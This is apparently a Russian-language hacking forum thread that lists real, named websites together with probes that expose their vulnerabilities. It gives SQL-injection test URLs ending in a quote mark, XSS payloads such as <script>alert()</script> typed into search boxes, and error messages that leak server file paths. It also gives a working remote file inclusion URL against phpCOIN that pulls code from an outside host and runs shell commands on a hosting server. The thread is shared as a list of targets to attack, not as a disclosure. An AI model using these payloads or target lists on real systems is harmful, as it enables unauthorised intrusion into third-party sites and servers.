http://www.generis.ru/?page=press_wholenews&id='
http://www.integracija.gov.lv/forum/?setc=1&forumid='
http://www.mossei.ru/?page='
Вот для начала

Идея хорошая принципы .

_www.pansionmsu.ru , в строке поиска <script>alert()<script>
_http://msu.ru/ , в строке поиска , <script>alert()<script> не вышел , а <marquee>msu</marquee> выходит .

_http://online.ua/ Строка поиска , <marquee>UA</marquee> , <img src="http://www.online.ua/all/0.gif"> покажет свой собственный логотип который в верхнем левом углу .

_http://referat.star-info.ru

В поиске если написать <i>i</i> то будет так

Warning: eregi_replace(): REG_EMPTY in /usr/home/www/user/referat.star-info.ru/inc/func on line 73

www.supersait.net.ru/billing/config.php?_CCFG[_PKG_PATH_DBSE]=http://qwe20063.narod.ru/&cmd=id
сам сайт supersait.net.ru нечего из себя не представляет, зато он хостится на очень известном хостинге, до которого можно добраться используя багу в phpcoin.
Тоесть благодаря php include мы можем выполнять никсовые комманды (ls;pwd;echo;cat) на сервере.

_http://vidahl.agava.ru/cgi-bin/dic.cgi?search=%3Ci%3Ei%3C%2Fi%3E&method=exact




В графе поиск статьи <script>alert()</script>

Справочник телефонов города Орла

http://www.g-play.ru/orel/

"Поиск организаций по названию, виду деятельности:"

В поиске <script>alert()</script>

Еще .

1)


url : _http://prohosting.fatpickle.com/search

<script>alert()</script> в поиске .

2)



Url: _http://www.babr.ru/index.php?pt=pages


<script>alert()</script> в поиске .

3)

url : _http://www.ambercity.ru/


<script>alert()</script> в поиске .

1)


Url :_http://www.cityvision2000.com

Можно узнать путь установки .

В поиске <script>alert()</script>

"D:\Webs\city\www\search.cgi": No such file or directory

2)

url: _http://www.pages.ru/

Поиск <script>alert()</script>

_http://zna.nu/vg_eng.php?id='
Интересный сайт